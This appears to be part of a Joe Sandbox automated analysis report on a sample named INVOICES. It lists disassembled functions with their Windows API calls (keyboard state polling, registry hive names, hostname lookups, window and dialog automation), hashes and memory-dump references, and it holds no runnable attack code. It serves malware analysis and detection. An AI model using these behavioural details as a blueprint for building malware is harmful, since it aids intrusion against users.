                                                                                                                                  • Opcode ID: 98bf528ce591ea3aa7fa1feb845c4cd1766f7e4d0a89cdce09808cb0c51b4112
                                                                                                                                  • Instruction ID: 45a850cf7d74ab04162037a95366252567502615f53ed3fc8fca4bc2ba282eec
                                                                                                                                  • Opcode Fuzzy Hash: 98bf528ce591ea3aa7fa1feb845c4cd1766f7e4d0a89cdce09808cb0c51b4112
                                                                                                                                  • Instruction Fuzzy Hash: 7D71D070B40209BAFB349F14DC4AFAABF64FF05764F244216F91AA61E1C7B96C20CB55
                                                                                                                                  Function 007B0EA5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                  • Opcode ID: e15becd222a4500560f6e8818279086376cb97dadf9071469243455d2745d65b
                                                                                                                                  • Instruction ID: b8eb944be2cbbba35a3c07fd63f2439944d95238ee7f33176d9bec8187e7f1d3
                                                                                                                                  • Opcode Fuzzy Hash: e15becd222a4500560f6e8818279086376cb97dadf9071469243455d2745d65b
                                                                                                                                  • Instruction Fuzzy Hash: A44147752052CACFDF20EF14D8A8AEF3720AF16300F944564FD515B292EB7D995ACBA0
                                                                                                                                  Function 0079536E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                    • Part of subcall function 00737A84: _memmove.LIBCMT ref: 00737B0D
                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007953D7
                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007953ED
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007953FE
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00795410
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00795421
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                  • Opcode ID: 3903f1a225e2009f727ced7c8d44d60998e6d9abd46e66cca3afbc80b007df9c
                                                                                                                                  • Instruction ID: 40e3b3ed7701696d4d4d851763f81da819bf3673893eb42fda72d1803c63cb64
                                                                                                                                  • Opcode Fuzzy Hash: 3903f1a225e2009f727ced7c8d44d60998e6d9abd46e66cca3afbc80b007df9c
                                                                                                                                  • Instruction Fuzzy Hash: 5111C8A09911B9B9EB64F7A2DC49DFF7B7CEB95B40F000429B405920D2DE680D44CAA1
                                                                                                                                  Function 007946F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                                  • Opcode ID: bdd49c423b5b018d0dac08f1ab1a14903506e45fa96d9ccb94eaa8247efbee9c
                                                                                                                                  • Instruction ID: 9880ebcb309928c51366ee75eeb841894dca10c5db97f160314d45d60f081ff2
                                                                                                                                  • Opcode Fuzzy Hash: bdd49c423b5b018d0dac08f1ab1a14903506e45fa96d9ccb94eaa8247efbee9c
                                                                                                                                  • Instruction Fuzzy Hash: 9C110D31504118AFDF20A760FC4AFDA77BCDF16715F1441B5F80596091EFBC9A868751
                                                                                                                                  Function 0079501C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • timeGetTime.WINMM ref: 00795021
                                                                                                                                    • Part of subcall function 0075034A: timeGetTime.WINMM(?,76C1B400,00740FDB), ref: 0075034E
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0079504D
                                                                                                                                  • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 00795071
                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00795093
                                                                                                                                  • SetActiveWindow.USER32 ref: 007950B2
                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007950C0
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 007950DF
                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 007950EA
                                                                                                                                  • IsWindow.USER32 ref: 007950F6
                                                                                                                                  • EndDialog.USER32(00000000), ref: 00795107
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                  • String ID: BUTTON
                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                  • Opcode ID: 804ea40b54fd1fa427b3e7f6c880965b07aaf17bdd0b51c66dfa9c00a752c1b5
                                                                                                                                  • Instruction ID: f172a19f0cf56212bc6feacd4f2cffce24c211658c7647d38ce1afade03e48c9
                                                                                                                                  • Opcode Fuzzy Hash: 804ea40b54fd1fa427b3e7f6c880965b07aaf17bdd0b51c66dfa9c00a752c1b5
                                                                                                                                  • Instruction Fuzzy Hash: 7E2181B0241A08BFEB125F34FC89F363B69EB48795F149228F505921B1DB6D8D60CB69
                                                                                                                                  Function 0079D619 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0079D676
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0079D709
                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 0079D71D
                                                                                                                                  • CoCreateInstance.COMBASE(007C2D7C,00000000,00000001,007E8C1C,?), ref: 0079D769
                                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0079D7D8
                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 0079D830
                                                                                                                                  • _memset.LIBCMT ref: 0079D86D
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0079D8A9
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0079D8CC
                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 0079D8D3
                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 0079D90A
                                                                                                                                  • CoUninitialize.COMBASE ref: 0079D90C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1246142700-0
                                                                                                                                  • Opcode ID: 2a28dab1fdc299a4efc70fc1ffbd6d2337282d31b04542aa5b468e2eb174ce16
                                                                                                                                  • Instruction ID: 15f69ac12863db9bc84485399925b3efe28073c71091f3da1a0ac6b917c99e4c
                                                                                                                                  • Opcode Fuzzy Hash: 2a28dab1fdc299a4efc70fc1ffbd6d2337282d31b04542aa5b468e2eb174ce16
                                                                                                                                  • Instruction Fuzzy Hash: 5EB1FB75A00109EFDB14DFA4D888EAEBBB9FF48714F148469E909EB251DB34ED41CB50
                                                                                                                                  Function 0079034D Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 007903C8
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00790433
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00790453
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 0079046A
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00790499
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 007904AA
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 007904D6
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 007904E4
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0079050D
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0079051B
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00790544
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00790552
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: 103e8c7efab31782658a43db80fe724d7b1b40e8f7a76c5b6aa30b12199b1d66
                                                                                                                                  • Instruction ID: e2423b4ef61e8fc52f2e8b0394a892928a88d897987ab93c13750b3779128930
                                                                                                                                  • Opcode Fuzzy Hash: 103e8c7efab31782658a43db80fe724d7b1b40e8f7a76c5b6aa30b12199b1d66
                                                                                                                                  • Instruction Fuzzy Hash: F251A6209187846EEF35DBB09815BAEBFB49F02780F48859DD5C2561C2DA6C9B4CCBE1
                                                                                                                                  Function 0078C529 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 0078C545
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0078C557
                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0078C5B5
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0078C5C0
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0078C5D2
                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0078C626
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0078C634
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0078C645
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0078C688
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0078C696
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0078C6B3
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0078C6C0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                  • Opcode ID: 7472f3944eebff4ba670e6049831967441bcb2f02c0418d9b4ee2e3f31ece3ff
                                                                                                                                  • Instruction ID: 399fa9a1c45d4d44c9369783a46777be86d08208055712cc5697ebaa29b73857
                                                                                                                                  • Opcode Fuzzy Hash: 7472f3944eebff4ba670e6049831967441bcb2f02c0418d9b4ee2e3f31ece3ff
                                                                                                                                  • Instruction Fuzzy Hash: 1A516F71B00205ABDB18CFA8DD89FAEBBB6EB88710F148239F915D6290DB749D008B14
                                                                                                                                  Function 007321A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 007321D3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                  • Opcode ID: 14a382d4837baa046195258d878d3f904b0f30e5ddf0bedbf7afcafd4bfdb6c7
                                                                                                                                  • Instruction ID: f6cbbe99445a8fd43a5ea5f726d7c268de7b20a14ed7b3d398726587decb6309
                                                                                                                                  • Opcode Fuzzy Hash: 14a382d4837baa046195258d878d3f904b0f30e5ddf0bedbf7afcafd4bfdb6c7
                                                                                                                                  • Instruction Fuzzy Hash: A741B331100548EBEB215F28DC48BBA3B65FB06731F258365FD668A1E3C7398C42DB25
                                                                                                                                  Function 0079A931 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?,007BF910), ref: 0079A995
                                                                                                                                  • GetDriveTypeW.KERNEL32(00000061,007E89A0,00000061), ref: 0079AA5F
                                                                                                                                  • _wcscpy.LIBCMT ref: 0079AA89
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                  • API String ID: 2820617543-1000479233
                                                                                                                                  • Opcode ID: 4e19f25701b7ba38cf48a381e98d71977feb801aeda35e45046217f002372678
                                                                                                                                  • Instruction ID: b3be1f855ceb181a67192e0e9636ac5303257abc9b2aef2d1189c4788b5de3f2
                                                                                                                                  • Opcode Fuzzy Hash: 4e19f25701b7ba38cf48a381e98d71977feb801aeda35e45046217f002372678
                                                                                                                                  • Instruction Fuzzy Hash: 4851DF31109341AFCB14EF14D895AAEB7A5FF85300F10892DF996572A2DB78AD09CB93
                                                                                                                                  Function 00739997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __i64tow__itow__swprintf
                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                  • API String ID: 421087845-2263619337
                                                                                                                                  • Opcode ID: b1463a67b05f9314a48368806a032c488b395c82504f39e79a68d8c16b3bab97
                                                                                                                                  • Instruction ID: f4b32b02b0939b7043a707f9589b0e2595e6d631dbf0c15fecd33f58b253803d
                                                                                                                                  • Opcode Fuzzy Hash: b1463a67b05f9314a48368806a032c488b395c82504f39e79a68d8c16b3bab97
                                                                                                                                  • Instruction Fuzzy Hash: 8741E771514206EFEB249F34DC46F7677E4EF44300F2044AEE94AD7292EAB9AD42CB51
                                                                                                                                  Function 007B7184 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007B719C
                                                                                                                                  • CreateMenu.USER32 ref: 007B71B7
                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 007B71C6
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B7253
                                                                                                                                  • IsMenu.USER32(?), ref: 007B7269
                                                                                                                                  • CreatePopupMenu.USER32 ref: 007B7273
                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007B72A0
                                                                                                                                  • DrawMenuBar.USER32 ref: 007B72A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                  • String ID: 0$F
                                                                                                                                  • API String ID: 176399719-3044882817
                                                                                                                                  • Opcode ID: 8fe602e6ed081e317b3334af592c85a45038f0008f6dcd9cfa50bf262b2b4475
                                                                                                                                  • Instruction ID: d86a58b1b8117e4643199b1e084c579341add8540e9c3c391a123f44c7e4b634
                                                                                                                                  • Opcode Fuzzy Hash: 8fe602e6ed081e317b3334af592c85a45038f0008f6dcd9cfa50bf262b2b4475
                                                                                                                                  • Instruction Fuzzy Hash: F7414974A01209EFDB24DF64D884FDA7BB5FF89350F144129F905A7361D738A910CBA4
                                                                                                                                  Function 007B74ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007B7590
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 007B7597
                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007B75AA
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 007B75B2
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 007B75BD
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 007B75C6
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 007B75D0
